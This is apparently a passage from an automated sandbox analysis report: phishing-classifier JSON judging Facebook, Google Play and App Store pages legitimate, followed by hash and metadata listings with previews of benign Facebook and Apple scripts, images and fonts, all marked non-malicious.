                                                                                                                                                                                                                                "input_fields":"Email or phone,
                                                                                                                                                                                                                                 Password"}
                                                                                                                                                                                                                                URL: https://www.facebook.com/pages/create/?ref_type=registration_form Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Facebook"],
                                                                                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                                                                                "prominent_button_name":"Log in",
                                                                                                                                                                                                                                "text_input_field_labels":["Email or phone",
                                                                                                                                                                                                                                "Password"],
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://www.facebook.com/pages/create/?ref_type=registration_form Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "phishing_score":1,
                                                                                                                                                                                                                                "brands":"Facebook",
                                                                                                                                                                                                                                "legit_domain":"www.facebook.com",
                                                                                                                                                                                                                                "classification":"wellknown",
                                                                                                                                                                                                                                "reasons":["The URL matches the legitimate domain name for Facebook.",
                                                                                                                                                                                                                                "Facebook is a well-known brand.",
                                                                                                                                                                                                                                "The input fields (Email or phone,
                                                                                                                                                                                                                                 Password) are typical for a login page on Facebook."],
                                                                                                                                                                                                                                "brand_matches":[true],
                                                                                                                                                                                                                                "url_match":true,
                                                                                                                                                                                                                                "brand_input":"Facebook",
                                                                                                                                                                                                                                "input_fields":"Email or phone,
                                                                                                                                                                                                                                 Password"}
                                                                                                                                                                                                                                URL: https://play.google.com/store/search?q=instagram&c=apps&hl=ru&gl=US Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Instagram"],
                                                                                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                                                                                "prominent_button_name":"",
                                                                                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://apps.apple.com/uz/app/instagram/id389801252 Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Instagram"],
                                                                                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://apps.apple.com/uz/app/instagram/id389801252 Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Instagram"],
                                                                                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (821)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):7626
                                                                                                                                                                                                                                Entropy (8bit):5.215559608926212
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:OtQ0m8mBOZgS9tn0Ll9829FAeHlVPrMNW:OtFuSD4829FAeHzPAW
                                                                                                                                                                                                                                MD5:33AF753815E0763128B33C38F393AF19
                                                                                                                                                                                                                                SHA1:FD81C07EDD497B91F91629687D2AB6976F287E17
                                                                                                                                                                                                                                SHA-256:A7A8465112A5F495E5C95139568A59BF35B3116624A5861B71472070520D699E
                                                                                                                                                                                                                                SHA-512:D5981A0D80035A3E0B8EFBE12B90C5E82A53F8C2CBC100001D344DC645B07A76DB3B75D863A5BB733F54B9E13B4C0A515B63041F50DCFC9AC750C092C436DBF5
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/chunk.26.d8fd25d7ba389f9fe03e.js
                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[26],{71026:function(e,t,n){n.r(t),n.d(t,{environment:function(){return a},eventRecorder:function(){return F},immediateEventRecorder:function(){return q},logger:function(){return D},network:function(){return E},setEventQueuePostIntervalEnabled:function(){return N}}).var s=n(76588),r=n(24178),u=n(32722),o=r.SC.attachDelegate,a={setDelegate:function(e){return o(this,e)},globalScope:function(){return window}},i={AJAX:"ajax",AJAX_SYNCHRONOUS:"ajaxSynchronous",IMAGE:"image",BEACON:"beacon"},v=r.vc.metricsDisabledOrDenylistedEvent,c=r.vc.removeDenylistedFields,l={},p=["dsId","consumerId"].function f(e,t,n){var s=null.return n&&!v.call(u.Z,n.eventType,t)&&(c.call(u.Z,n,t),m(t,n),e.apply(null,Array.prototype.slice.call(arguments,1)),s=n),s}function d(e,t){l[e]=l[e]||{},l[e]=t}function Q(){l={}}function m(e,t){l[e]=l[e]||{},l[e].anonymous&&p.forEach((function(e){delete t[e]}))}var y=r.SC.attachDel
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (878)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1441
                                                                                                                                                                                                                                Entropy (8bit):4.923625217494772
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:ildT+lZadfID4P9Gpl3fBzR1SQLA2RAMRMT6XFKg/7/GpSw8G9bFw4YZn:ild2ZbI9GpvRQQ82OUugFKg/7/Gpj8Gw
                                                                                                                                                                                                                                MD5:188415311B33E9DFC79C3CC6147ED47D
                                                                                                                                                                                                                                SHA1:486B072C15EA89B3D39F607F92327F1A338254B0
                                                                                                                                                                                                                                SHA-256:8B3DA2AC016CE7C6F38F10052C50C7958935276BD5885009716FEC7B3D8ED681
                                                                                                                                                                                                                                SHA-512:DD95C297899B58507824F3A3129E060BBA8A9F7D2045526DC66DAB584D19571069D84EB2591B7FBE71A0FBA96DD1BE1A32995184D37FCA9A1F699FC71739644B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[356],{84356:function(t){var o="touch".function s(t,o){this._target=t||document.body,this._attr=o||"data-focus-method",this._focusMethod=this._lastFocusMethod=!1,this._onKeyDown=this._onKeyDown.bind(this),this._onMouseDown=this._onMouseDown.bind(this),this._onTouchStart=this._onTouchStart.bind(this),this._onFocus=this._onFocus.bind(this),this._onBlur=this._onBlur.bind(this),this._onWindowBlur=this._onWindowBlur.bind(this),this._bindEvents()}var n=s.prototype.n._bindEvents=function(){this._target.addEventListener("keydown",this._onKeyDown,!0),this._target.addEventListener("mousedown",this._onMouseDown,!0),this._target.addEventListener("touchstart",this._onTouchStart,!0),this._target.addEventListener("focus",this._onFocus,!0),this._target.addEventListener("blur",this._onBlur,!0),window.addEventListener("blur",this._onWindowBlur)},n._onKeyDown=function(t){this._focusMethod="key"},n._onMouseD
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5717)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):67930
                                                                                                                                                                                                                                Entropy (8bit):5.350281148314441
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:9HDLotdWvrV8YctZCUmeTVxETDGjTHvoKNU28W3Bq9eW5:VDLotdWvrV8YctZCUiTDYDvoKNUExqb
                                                                                                                                                                                                                                MD5:F16C089BF22C5A3450A3B941D8D1D3B3
                                                                                                                                                                                                                                SHA1:6543253FE5800826256E7F0900D6BE807ED82DE2
                                                                                                                                                                                                                                SHA-256:0FB7810E3D1EEAC1CA74723786D499CFB6CE9E7C2942F0959F13D6F5A935736A
                                                                                                                                                                                                                                SHA-512:ABD13F038E07C841551DDC35C40BAD7E6A1A7B2351A70A6EFB2A9B538C159A26524C21D2B5DF0EFF9D619A2709EB4D5E0EE10025B79BE6E88F95C7F420D9F57A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3iluz4/y2/l/en_GB/MvRHUS1G-cc.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("BrowserScroll",[],(function(a,b,c,d,e,f){function a(){var a;return window.pageXOffset||((a=document.documentElement)==null?void 0:a.scrollLeft)||((a=document.body)==null?void 0:a.scrollLeft)||0}function b(){var a;return window.pageYOffset||((a=document.documentElement)==null?void 0:a.scrollTop)||((a=document.body)==null?void 0:a.scrollTop)||0}f.getPageScrollLeft=a;f.getPageScrollTop=b}),66);.__d("StickyController",["CSS","Event","Style","Vector","queryThenMutateDOM"],(function(a,b,c,d,e,f){a=function(){"use strict";function a(a,b,c,d){this._element=a,this._marginTop=b,this._onchange=c,this._proxy=d||a.parentNode,this._boundQueryOnScroll=this.shouldFix.bind(this),this._boundMutateOnScroll=this._mutateOnScroll.bind(this)}var c=a.prototype;c.handleScroll=function(){b("queryThenMutateDOM")(this._boundQueryOnScroll,this._boundMutateOnScroll)};c.shouldFix=function(){return b("Vector").getElementPosition(this._proxy,"viewport").y<=this._marginTop};c._mutateOnScroll=fun
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (8096)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):55228
                                                                                                                                                                                                                                Entropy (8bit):5.329308796986016
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:c3Rf8me01IhZaorAIZu42ZlJZ4Us/Hlybpypdagqf:ixe0IZu1D4jvlybn
                                                                                                                                                                                                                                MD5:614AF3AA20EF61E30C3FFE0C88FE61DA
                                                                                                                                                                                                                                SHA1:48018D5135B84EF010A2C228C5F4411BE8597357
                                                                                                                                                                                                                                SHA-256:66ED8A76E009F2492B61ABC94BB5A4F0867B60CB397057B4E8A5905AFD9412E2
                                                                                                                                                                                                                                SHA-512:4D9B3D7DF01A2621141775DE8BD58FD43D38AF88598E6A8F14DC0E0DA4A3F900BB5B963826D37D1EBBAE24CC1D4F1026AADCC6184427323EF1D25D48A46101B1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/y3/r/Ja35YE72DAb.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdsObjectTypes",[],(function(a,b,c,d,e,f){a=Object.freeze({ACCOUNT:"ACCOUNT",ADGROUP:"ADGROUP",AUDIENCE:"AUDIENCE",BUSINESS_ACCOUNT:"BUSINESS_ACCOUNT",CAMPAIGN:"CAMPAIGN",CAMPAIGN_GROUP:"CAMPAIGN_GROUP",CREATION_PACKAGE:"CREATION_PACKAGE",CREATIVE:"CREATIVE",HISTORY:"HISTORY",OPPORTUNITIES:"OPPORTUNITIES",PIXEL:"PIXEL",PRIVACY_INFO_CENTER:"PRIVACY_INFO_CENTER",TRANSACTION:"TRANSACTION",MESSAGES:"MESSAGES"});f["default"]=a}),66);.__d("AdsALSubsurface",["AdsObjectTypes"],(function(a,b,c,d,e,f,g){"use strict";var h=(f={},f[c("AdsObjectTypes").CAMPAIGN_GROUP]="campaign",f[c("AdsObjectTypes").CAMPAIGN]="adset",f[c("AdsObjectTypes").ADGROUP]="ad",f);function a(a,b){return a+":"+b}function b(a){var b;if(a==null)return;return(b=h[a])!=null?b:a.toLowerCase()}function d(a){return a}function e(a){return a==null?"":a}g.getFullSurfaceString=a;g.getAdsObjectTypeSubsurface=b;g.getAdObjectLevelSubsurface=d;g.getDynamicSubsurface=e}),98);.__d("Currency",["CurrencyConfig"],(funct
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4286
                                                                                                                                                                                                                                Entropy (8bit):4.933290584110762
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:5+8ItBBBuxc+6QQQQQiRRRRRRRRRRJJO9P111118B:1cjRRRRRRRRRRi90
                                                                                                                                                                                                                                MD5:8CDDCA427DAE9B925E73432F8733E05A
                                                                                                                                                                                                                                SHA1:1999A6F624A25CFD938EEF6492D34FDC4F55DEDC
                                                                                                                                                                                                                                SHA-256:89676A3FB8639D6531C525E5800FF4CC44D06D27FF5607922D27E390EB5B6E62
                                                                                                                                                                                                                                SHA-512:20FBEE2886995C253E762F2BB814AD16890B0989DEAB4D92394363EF0060B96A634D87C380C7BA1B787A8AB312BE968FED9329A729B4E0D64235A09E397DB740
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:...... .... .........(... ...@..... ......................................................................e.G.c.......................d...c...e.G.............................................................................j...f...f...f...e.......................f...f...f...g...f...j...........................................................m$..j...i...h...h...h...h.......................h...h...h...h...h...i...j...m$..............................................j...j...j...j...j...j...k...j.......................j...k...j...k...k...k...k...l...u.......................................q.-.n...m...l...m...l...l...m...l.......................l...m...l...m...m...m...m...m...n...q.-.............................u...p...o...o...o...o...o...o...o...o.......................o...p...o...p...p...o...p...o...o...p...u........................$..r...r...q...q...q...q...q...q...r...q.......................r...q...r...q...q...r...q...r...r...q...r....$..................v...t...t...t...t...t...t...t...t
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (35297)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):146544
                                                                                                                                                                                                                                Entropy (8bit):5.693066609916641
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:xjMLI23A/RkX4CMMMx4wySAWh/fH6i4mpsWyE96PatWf1atHp:xjMLI23A/RkJOyjiTWf1ar
                                                                                                                                                                                                                                MD5:F919798AF73D9EDB7029150EFFED7938
                                                                                                                                                                                                                                SHA1:4DB71EA1E3ADB27E6BF6F42CA22D51D16412D789
                                                                                                                                                                                                                                SHA-256:116F1CAABFAB3BC63EA2134EC0377CC250CCE9F9B396E24EF2914ACDCE9B99E2
                                                                                                                                                                                                                                SHA-512:9BD995DBC8C48F86DA95EFF7A8260EB0457F8C38ED8056C9CD9DDD4DAC8383951CDEC2095FCAA0484D470BD4DB2000589C17414413DFF30E4A801633A0169485
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3iH-D4/yD/l/en_GB/kIGqHY8H8ti.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdAppConstraintsConstants",[],(function(a,b,c,d,e,f){"use strict";a=[707152572647324..toString()];b="/apps";f.AD_APP_CONSTRAINT_VIEWER_ROLES=a;f.BASE_PATH=b}),66);.__d("AdsAPIObjectives",[],(function(a,b,c,d,e,f){e.exports={APP_INSTALLS:"APP_INSTALLS",BRAND_AWARENESS:"BRAND_AWARENESS",CANVAS_APP_ENGAGEMENT:"CANVAS_APP_ENGAGEMENT",CANVAS_APP_INSTALLS:"CANVAS_APP_INSTALLS",CONVERSIONS:"CONVERSIONS",DEPRECATED_CLICKS:"DEPRECATED_CLICKS",EVENT_RESPONSES:"EVENT_RESPONSES",EXTERNAL:"EXTERNAL",GROUP_JOINS:"GROUP_JOINS",IMPRESSIONS:"IMPRESSIONS",INCOMPATIBLE_CANVAS_APP_ENGAGEMENT:"INCOMPATIBLE_CANVAS_APP_ENGAGEMENT",INCOMPATIBLE_CANVAS_APP_INSTALLS:"INCOMPATIBLE_CANVAS_APP_INSTALLS",INCOMPATIBLE_EVENT_RESPONSES:"INCOMPATIBLE_EVENT_RESPONSES",INCOMPATIBLE_MOBILE_APP_INSTALLS:"INCOMPATIBLE_MOBILE_APP_INSTALLS",INCOMPATIBLE_OFFER_CLAIMS:"INCOMPATIBLE_OFFER_CLAIMS",INCOMPATIBLE_PAGE_ENGAGEMENT:"INCOMPATIBLE_PAGE_ENGAGEMENT",INCOMPATIBLE_PAGE_LIKES:"INCOMPATIBLE_PAGE_LIKES",
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3792)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):9345
                                                                                                                                                                                                                                Entropy (8bit):5.263985222733283
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:5ncU1ciSTM/JvZLGCfKXuY3tZ8e1hwzTrubXQggbhDU/qFGK31yH0IYuApR2:mUnSTwOoKeiZn1hcwYDPFGK3g0HS
                                                                                                                                                                                                                                MD5:789920D64701571A8C9CC2C0A333661D
                                                                                                                                                                                                                                SHA1:5798B3B67D8B929875F4A006518ADBECFC331206
                                                                                                                                                                                                                                SHA-256:60382F476A01A84BE86A0B2CC5743185FC9E1F4FB378C13EDA734132EFCDB295
                                                                                                                                                                                                                                SHA-512:77C981AF5E2FDC8DC0FB51CD45F2C9ECB6C90D453A66B43C3C905785AE52E832BC0B21A891283D085407F822295DED0DA5A1B5E2852FB6CA8243409A48BE35EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdsToggleSource",["keyMirror"],(function(a,b,c,d,e,f,g){"use strict";a=c("keyMirror")({action_bar_button:null,action_column_cell:null,automated_brand_lift_opt_in:null,cm_tip:null,copy:null,create:null,drawer_button:null,draft_indicator_table_cell:null,dropdown_button:null,edit_button:null,editor_footer:null,editor_publish:null,external_quick_create:null,full_funnel_strategy_dialog:null,ig_login_ig_boosted_post_unsupported_error_banner:null,inline_publish_cta:null,insights_button:null,investigate_cta:null,keyboard_escape:null,keyboard_shortcut:null,lightweight_attribution_campaign_name:null,midflight_recs_resolution_card:null,onenav_tab:null,perf_summary_tip:null,reach_frequency_dialog:null,secondary_view_close_button:null,secondary_view_switcher:null,signal_loss_limits_card:null,split_test_convergence_tip:null,split_test_dialog:null,split_test_opted_in_campaign_group_published:null,split_test_draft_publish_prompt:null,split_test_beaker_icon_tooltip:null,start_yo
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (11608)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):49300
                                                                                                                                                                                                                                Entropy (8bit):5.479518690240178
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:nVKzWIP4JeRBx5AJsNfWVO35t8w7xMYdbXV/qrqp3YWuScV178GfjCN+:Vg4hJsNfWV+h67BLCc
                                                                                                                                                                                                                                MD5:F2BC7A733B7E080B2ABD68E746BD35A9
                                                                                                                                                                                                                                SHA1:9AC345509086964E48D5410DD487B17B7395E077
                                                                                                                                                                                                                                SHA-256:2948C27949C446E608F107D7DEAE7B84DF1A5D62929D0363788996171FFB827A
                                                                                                                                                                                                                                SHA-512:52EB4A281E85D0D54CC6EBB06454C2514ACA79AACC53EF94046D7F85B5E62B58963845CE0BB2D2984F1F58B5DA81CD05C6CCB9B514C2777E5371D1C734BC1EC0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ArbiterMixin",["Arbiter","guid"],(function(a,b,c,d,e,f,g){var h="arbiter$"+c("guid")(),i=Object.prototype.hasOwnProperty;a={_getArbiterInstance:function(){return i.call(this,h)?this[h]:this[h]=new(c("Arbiter"))()},inform:function(a,b,c){return this._getArbiterInstance().inform(a,b,c)},subscribe:function(a,b,c){return this._getArbiterInstance().subscribe(a,b,c)},subscribeOnce:function(a,b,c){return this._getArbiterInstance().subscribeOnce(a,b,c)},unsubscribe:function(a){this._getArbiterInstance().unsubscribe(a)},unsubscribeCurrentSubscription:function(){this._getArbiterInstance().unsubscribeCurrentSubscription()},releaseCurrentPersistentEvent:function(){this._getArbiterInstance().releaseCurrentPersistentEvent()},registerCallback:function(a,b){return this._getArbiterInstance().registerCallback(a,b)},query:function(a){return this._getArbiterInstance().query(a)}};b=a;g["default"]=b}),98);.__d("FbtResultBase",[],(function(a,b,c,d,e,f){"use strict";var g=function(){fu
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (333)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):877
                                                                                                                                                                                                                                Entropy (8bit):5.087140060597258
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:UXv7Fc4DpWNRKL+BK/sgl9hrIYerznR3zueIDRTLG9fkVlF38LG0DAvue1nfQOO1:u6oTTlrIYevhTuKtLG0MJQOFsCK
                                                                                                                                                                                                                                MD5:87D2E99C717F6A11EF59AB4D56189D37
                                                                                                                                                                                                                                SHA1:07395D5E315170A7ACFDD3C84D343182ABE98488
                                                                                                                                                                                                                                SHA-256:7CF7F25A6FEB976FC62596722380603118B8C7572E0867D0254D071BC2B93CD8
                                                                                                                                                                                                                                SHA-512:19233492091920B98A067943C453D1538D7844EC4DB3B489B5B72E5D41B9E9E58A1D1984679653133ED60CF7002E014530DED9B55BA62853CD8867E5936EF0AC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.import{c as n}from"./p-2649b6ee.js";var r=n((function(n,r){Object.defineProperty(r,"__esModule",{value:!0}),r.getLanguages=void 0,r.getLanguages=function(){if("undefined"==typeof navigator)return[];if(navigator.languages)return navigator.languages;const n=navigator.language||navigator.userLanguage;return n?[n]:[]}}));export{r as n}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):6016
                                                                                                                                                                                                                                Entropy (8bit):7.931230609029136
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:VKPMNbu1/GzZgw2MUe5N4iL+IdSHgwg/CPD5TreJ7xlVmhx1a2sKdNJVwJ49fDfx:APMQ1/k3h5F+1uCP1c73Ve7aEnwa5DWw
                                                                                                                                                                                                                                MD5:2EDBD2236163FCACA2E6ADD4655EB2D8
                                                                                                                                                                                                                                SHA1:785170958CE759A39179424E02914DCF04511957
                                                                                                                                                                                                                                SHA-256:6253D1FE8F45FC5B01DCCA1DB4854CD8BB819389A848978791AC1D3FF98102EE
                                                                                                                                                                                                                                SHA-512:3E5DE01D3B3E0E6F44FD006085CBA1863291CE52D1C9C07088EA1B15CAF273B47C96E11F7101428F87F2AA1116AF73D31F9E87F1F6E05CB3E24839AC37703E54
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://www.facebook.com/images/pages/create/biz_illustration.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR..............X......sRGB........:IDATx..].UU..wDD.DD..ADoA..D/EO.....C/}.C.IA..EPY.AE...d..=....6j..**~.u.8*......(......(t.q.z....?.^...r.....k........t....*.7JdV..l.d.....H.K..xd&<..z.MzJ7$CW......O....?..s.o..V.....'...6.A.4..]j....2I.w...h...lR\...?S....^...=.....' (IC.J......j....g..2..H...s..) (Nu.3.Jd~...SLr...qg..-Pz.f.h..i.2)}....XEER.k....=.....M. ...)...f.._.T4...h...A..$I.z..s...3....Y...[..6.sws.......p=x.y.........||....A.6...}...*.......T.."&x..W....W...C>U.x..Q.\...Pm........{L*}P.f..h..u(y.8K.,...."zB.....-.v$..!@3Bh".B.P.../..8..YM<..|......8y..5...y.:...JF.R}.."./gP4 ..#..x..S.>d..Ks......W~..qNN..`.AS..{..n\.m.)...&...S@./.=2..JUd...|-......@.@Q..g)......T.!C}...4.d....i.24...U>.....y....".+G....k...h9..G.x.J.......Of.pU]..]^......I...5dm2g..(Bf....k....-.c.H.....d..&.d.GH...g.~.*..Ri.. .._..".#]q}p.v..)>L..A..R.<I...>..#....=.......3I.k.....0.H..W.....3....*..U?..sA.MWy..-9?X .2...._....n.A.....S8....ZJ&...J.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), CFF, length 233240, version 1.0
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):233240
                                                                                                                                                                                                                                Entropy (8bit):7.998929579369334
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:6144:RFtUp8TP0YyjsuhShhu0bAlZYs/UAkHgX4gf1G:RXUBNshhu0bA7YscgX4gfU
                                                                                                                                                                                                                                MD5:86A24C421A052D323E49A952D88805B5
                                                                                                                                                                                                                                SHA1:814A9DAF46A34AD6BC4F5BC0DE4940B166A85870
                                                                                                                                                                                                                                SHA-256:A359121948E08165E21894786EE4E4E3C3F1AA55BB44DBAAD470D4ADF1B7DB9B
                                                                                                                                                                                                                                SHA-512:0993B3670D42D9032831122D0E43D1843DA2361D8781B0CD75AA080A57F9DA273AC8A54414F8598EE12B2878787245B564A07F7E401C0282A47B5A0F57A825B3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://fonts.gstatic.com/s/googlematerialicons/v142/Gw6kwdfw6UnXLJCcmafZyFRXb3BL9rvi0QZG3Q.woff2
                                                                                                                                                                                                                                Preview:wOF2OTTO..............................................X.`..`.6.$..d....~. [......<.....* .d..K..A...&@..\....n..!.N...(.G.../.v.y.....................n..n...l*%.H.U..r.xp..Q....z.A..G.Q*...4R.@NZ7...5..^.RE.MjY.l.....v.{#.T.J.*..J....*....2.h"&.l.+Se.UI..J*(A......9j.4.j.hjaq.|i.1`.p,..S.W..,..:F.k..w.H.t............ ...(........t{5...r.5#"....].>*..Z.}...l5"".XDH.*5T..M....;9sw.c.!....Q.}.........8d1....QH.*.....I .%72..s.......fQ.V;.SH...V.W...q..2-...Y#+.6..m..D@..?.g!5TSZ...R....D 7=...v.K6..p.." ...v..j....F4...?.....<.s..Z...._rw.......4.B..... u&4.'4l........@~..E@X..,y..].$..]f-..$i.o...\9..2.`.6.#...W.j...7".o..V....%3..........!..?U.J.V...V..Mvz.....>...A........Z.D..3..s...!W].TUR.nUed.B.[.IK7.`.5...*..DJ.<.ME.\X.h.wJ..\0s....z+.EAF..4..hr....;...zE......9..d.Z.I["2...2c.'..:.v..3%C..2.S.9.s..h.m..Qk..J.....'c...Y.G.........&m..........v.R..].z~..4.ZC.s.......0]`[......./..O.)Ri..f.H...d.I....<#|...C.../.Y.~e.vN.u....Sl.|
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 99196, version 1.0
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):99196
                                                                                                                                                                                                                                Entropy (8bit):7.997868398992993
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:1536:SQIJfyDgC8VN2bW1ToDcINoJjl3ox2/OSTGaaLDg39z0mRGRBLfG:lgpEW1T+Hel402bxk3ymQP+
                                                                                                                                                                                                                                MD5:474D73A771E0CC31B43849CD2BAD9CC4
                                                                                                                                                                                                                                SHA1:1D973B9CD90543FA43E6E74F164149278B9331FD
                                                                                                                                                                                                                                SHA-256:AE98C3B1ED18478144791BFA0C71056B422287CD41F9B7D35C99063B04BE58EB
